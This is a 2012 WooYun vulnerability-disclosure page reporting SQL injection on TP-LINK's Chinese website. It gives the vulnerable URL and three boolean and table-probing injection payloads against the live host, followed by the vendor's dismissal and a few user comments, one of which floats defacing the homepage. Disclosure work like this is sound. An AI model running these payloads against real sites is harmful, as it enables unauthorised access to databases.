当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011501

漏洞标题:TP-LINK官方网站注入漏洞

相关厂商:深圳普联技术有限公司

漏洞作者: Michael

提交时间:2012-09-26 11:13

修复时间:2012-09-26 17:06

公开时间:2012-09-26 17:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-26: 细节已通知厂商并且等待厂商处理中
2012-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

TP-LINK官方网站存在注入漏洞

详细说明:

注入点:http://www.tp-link.com.cn/pages/smb/products.asp?c=18
简单尝试了手工注入存在news等表,时间原因不用字典了。

漏洞证明:


http://www.tp-link.com.cn/pages/smb/products.asp?c=18 and 1=1
http://www.tp-link.com.cn/pages/smb/products.asp?c=18 and 1=2
http://www.tp-link.com.cn/pages/smb/products.asp?c=18 and exists (select * from news)

修复方案:

你懂的

版权声明:转载请注明来源 Michael@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-09-26 17:06

厂商回复:

非数字参数全改为默认值

最新状态:

2012-09-26:非常感谢您的反馈


漏洞评价:

评论

  1. 2012-08-29 14:12 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    没戏的,他们不管的,我手里也有,媒体叫,你懂得

  2. 2012-08-29 14:12 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    没戏的,他们不管的,我手里也有,媒体叫,你懂得

  3. 2012-08-30 04:23 | 邪少 ( 实习白帽子 | Rank:58 漏洞数:7 )

    没戏的,他们不管的,我手里也有,媒体叫,你懂得

  4. 2012-08-30 11:04 | asdf ( 实习白帽子 | Rank:49 漏洞数:5 | 生活大爆炸)

    @Vty 你是想挣积分么。这个我很早就报了? WooYun: tp-link 网站多个SQL注入漏洞

  5. 2012-08-30 11:38 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    @asdf 额,你怎么就知道我说的是这个呢,你是谁?

  6. 2012-09-26 17:16 | 剑心 ( 实习白帽子 | Rank:37 漏洞数:9 | xsser)

    没戏的,他们不管的,我手里也有,媒体叫,你懂得

  7. 2012-09-26 17:19 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

    @剑心 @邪少 @Vty 没戏? 不管? 那改首页呢?